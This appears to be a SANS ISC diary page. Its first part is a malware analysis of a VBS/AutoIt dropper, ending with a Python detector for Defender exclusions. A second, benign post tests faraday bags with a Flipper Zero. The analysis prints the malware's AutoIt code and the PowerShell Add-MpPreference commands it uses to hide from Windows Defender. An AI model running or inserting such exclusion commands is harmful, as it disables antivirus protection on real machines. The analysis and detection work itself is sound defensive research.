This VBS script is easy to understand. It will:
1. Wait for 4 seconds
2. Create a WScript.Shell object
3. Run the command “pxqic.pif kmpxxcxmlq.docx”
The .pif file is an AutoIt-compiled script that executes the content of the file passed as an argument. That file is also encoded and obfuscated, and it contains a malicious PowerShell script. Here is how to extract it easily:
remnux@remnux:/MalwareZoo/20230516/out$ cat kmpxxcxmlq.docx | \
    iconv -f UTF-16LE -t ASCII -c | \
    sed -n '/#ce/,/#cs/p' | \
    grep -v '^[#;]'
I did not publish the decoded PowerShell script here because it is too big. The script performs anti-VM and anti-debugging checks, and it prevents Microsoft Defender from scanning some files and directories:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\pxbc
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbe
Here is the code responsible for this:
Func AntiVirus()
    $owmi = ObjGet("winmgmts:\\localhost\root\SecurityCenter2")
    $colitems = $owmi.execquery("Select * from AntiVirusProduct")
    For $objantivirusproduct In $colitems
        $usb = $objantivirusproduct.displayname
    Next
    Return $usb
EndFunc

Func Disabler()
    if AntiVirus() = "Windows Defender" Then
    ;#RequireAdmin
    ShellExecute("powershell"," -Command Add-MpPreference -ExclusionPath " & @ScriptDir,"","",@SW_HIDE)
    ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'","","",@SW_HIDE)
    ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '.vbs'","","",@SW_HIDE)
    ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '.vbe'","","",@SW_HIDE)
    ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'","","",@SW_HIDE)
    ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'","","",@SW_HIDE)
    ;EndIf
endFunc
The PowerShell script also carries shellcode; it reads data from another obfuscated file. I still need more time to dig deeper...
Finally, the .pif executable launches 'RegSvcs.exe' and injects code into it.
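Those Add-MpPreference calls are the best detection opportunity in this chain: Defender exclusions are rarely added outside of management tooling, and never for script extensions by a process living in a freshly created directory. The following Python is an added example (not from the diary) that runs over constructed process-creation events built from the command lines shown above, in an assumed Sysmon-style JSON shape; the field names, the parent-process allowlist and the severity levels are assumptions for the demo, not a documented schema.

```python
"""Detect Defender exclusions added via Add-MpPreference in process-creation
logs. Added example: the events are constructed from the command lines the
diary shows, in an assumed Sysmon-like JSON shape (UtcTime, Image,
ParentImage, CommandLine)."""
import json
import re

ADD_MP_RE = re.compile(r"Add-MpPreference\b", re.IGNORECASE)
# One -ExclusionPath/-ExclusionProcess/-ExclusionExtension argument and its
# value, quoted with ' or ", or bare. PowerShell is case-insensitive.
EXCLUSION_RE = re.compile(
    r"-Exclusion(Path|Process|Extension)\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))",
    re.IGNORECASE,
)
# Extensions that should never be excluded from scanning.
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1",
                     ".bat", ".cmd", ".exe", ".scr", ".pif"}
# Assumed allowlist of parent images from which an admin might run this
# interactively; tune to the environment.
ALLOWED_PARENTS = {"explorer.exe", "mmc.exe"}


def parse_exclusions(command_line: str) -> list[tuple[str, str]]:
    """Return every (kind, value) exclusion requested in one command line."""
    if not ADD_MP_RE.search(command_line):
        return []
    out = []
    for m in EXCLUSION_RE.finditer(command_line):
        value = next(g for g in m.groups()[1:] if g is not None)
        out.append((m.group(1).capitalize(), value))
    return out


def classify(event: dict) -> list[dict]:
    """One alert per exclusion in the event, with a severity and the reasons."""
    alerts = []
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    for kind, value in parse_exclusions(event.get("CommandLine", "")):
        severity, reasons = "medium", []
        if parent not in ALLOWED_PARENTS:
            severity = "high"
            reasons.append(f"unexpected parent {parent or '<none>'}")
        if kind == "Extension" and value.lower().lstrip("*") in SCRIPT_EXTENSIONS:
            severity = "high"
            reasons.append("script/executable extension excluded")
        alerts.append({"ts": event.get("UtcTime"), "parent": parent, "kind": kind,
                       "value": value, "severity": severity, "reasons": reasons})
    return alerts


def detect(events_jsonl: str) -> list[dict]:
    """Run classify() over newline-delimited JSON events."""
    alerts = []
    for line in events_jsonl.splitlines():
        if line.strip():
            alerts.extend(classify(json.loads(line)))
    return alerts


# --- constructed events (timestamps and parent path are made up) -----------
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PIF = r"C:\pxbc\pxqic.pif"
EXPLORER = r"C:\Windows\explorer.exe"


def event(ts: str, parent: str, cmd: str) -> dict:
    return {"UtcTime": ts, "Image": PS, "ParentImage": parent, "CommandLine": cmd}


RAW_EVENTS = [
    event("2023-05-16 09:00:01", PIF, f"\"{PS}\" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'"),
    event("2023-05-16 09:00:01", PIF, f"\"{PS}\" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe"),
    event("2023-05-16 09:00:02", PIF, f"\"{PS}\" -Command Add-MpPreference -ExclusionPath C:\\pxbc"),
    event("2023-05-16 09:00:02", PIF, f"\"{PS}\" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'"),
    event("2023-05-16 09:00:03", PIF, f"\"{PS}\" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'"),
    event("2023-05-16 09:00:03", PIF, f"\"{PS}\" -Command Add-MpPreference -ExclusionExtension .vbe"),
    # query only, no exclusion added: must not alert
    event("2023-05-16 10:15:00", EXPLORER, f"\"{PS}\" -Command Get-MpPreference"),
    # an admin adding a path exclusion from an interactive shell: still worth a look
    event("2023-05-16 10:16:00", EXPLORER, f"\"{PS}\" -Command Add-MpPreference -ExclusionPath 'C:\\Program Files\\Backup Agent'"),
]
EVENTS_JSONL = "\n".join(json.dumps(e) for e in RAW_EVENTS)

if __name__ == "__main__":
    for a in detect(EVENTS_JSONL):
        print(a["severity"], a["kind"], a["value"], a["reasons"])
```

The same logic maps onto a Sigma rule (process_creation, CommandLine contains "Add-MpPreference" and "-Exclusion") for shipping to a SIEM; the Python version is here so the parent-process and extension reasoning can be tested against sample events before deployment.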
[1] https://www.rarlab.com/vuln_sfx_html.htm
[2] https://bazaar.abuse.ch/sample/e08a8ff9fadce5026127708c57b363bd0b2217a0a96d9ba4e7994601ad1a8963/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Wednesday, May 17th, 2023 https://isc.sans.edu/podcastdetail/8500, (Wed, May 17th)
Signals Defense With Faraday Bags & Flipper Zero, (Tue, May 16th)
There are situations where it is desirable to block signals between devices. Common scenarios are traveling, being in a location of uncertain safety, or otherwise being concerned with data privacy and geolocation. I was curious how well faraday bags and similar products protect wireless communications. A more common purchase these days is a wallet that helps protect against RFID skimming of credit card data [1].
Here are the scenarios tested, using some faraday bags (Haftigts) [2]:
Wireless communications scenario / Device:
- 125 kHz RFID: HID proximity card, read with Flipper Zero; HID proximity fob, read with Flipper Zero
- NFC: Credit Card, read with Flipper Zero
- Bluetooth: Phone in bag and bluetooth earbuds
- WiFi (802.11): Phone in bag used as hotspot, laptop connected to hotspot
- Cellular: Phone in bag, another cellular phone used to call it
Extensive testing was done using a variety of faraday bags and devices.
Scenario / Testing process:

HID proximity card:
- HID proximity card placed into bag
- Bag closed and sealed
- Flipper Zero placed on top of bag over card location
- Flipper Zero used to read 125 kHz RFID data

HID proximity fob:
- HID proximity fob placed into bag
- Bag closed and sealed
- Flipper Zero placed on top of bag over card location
- Flipper Zero used to read 125 kHz RFID data

Credit Card:
- Credit card placed into bag
- Bag closed and sealed
- Flipper Zero placed on top of bag over card location
- Flipper Zero used to read NFC data

Bluetooth:
- iPhone connected to iPods via Bluetooth
- iPhone playing audio content
- iPhone placed into bag
- Listened for audio disruptions

WiFi (802.11):
- Android phone with hotspot turned on
- Windows device connected to hotspot
- Continuous ping set to 8.8.8.8
- Android phone placed into bag
- Ping reviewed for disruptions

Cellular:
- iPhone placed into bag
- Android phone used to call iPhone

The results of these tests came quickly. For the Flipper Zero tests, either the data could be read or it couldn't. For Bluetooth and WiFi, it was just a matter of waiting to see how the signal changed. Now for the results:
Scenario / Result:
- HID proximity card: Fail (Flipper Zero was able to read the data)
- HID proximity fob: Fail (Flipper Zero was able to read the data)
- Credit Card: Success (Flipper Zero was unable to read the data)
- Bluetooth: Limited Success (Audio signal cut in and out, heavily impacted by proper sealing of the bag)
- WiFi (802.11): Success (Wireless network was quickly disconnected and unable to be seen from mobile hotspot feature)
- Cellular: Success (iPhone was unable to receive phone call, Android phone was directed straight to voicemail)
From the testing, there were a few takeaways:
- Test to make sure your protections are effective
- Make sure to follow instructions - Bluetooth audio was very functional with a partially closed bag
- When in doubt, turn off features, or devices, if not needed and when in a space of uncertain safety
For some of these attacks, an attacker would need to be very close to succeed. In the Flipper Zero tests, the reader was physically sitting on top of the bag, which would be much more challenging for someone to achieve in a real-world situation.
[1] https://www.zdnet.com/article/do-rfid-blocking-cards-actually-work-my-flipper-zero-revealed-the-truth/
[2] https://www.amazon.com/dp/B0BHSH8BLR?ref=ppx_yo2ov_dt_b_product_details&th=1
--
Jesse La Grew
Handler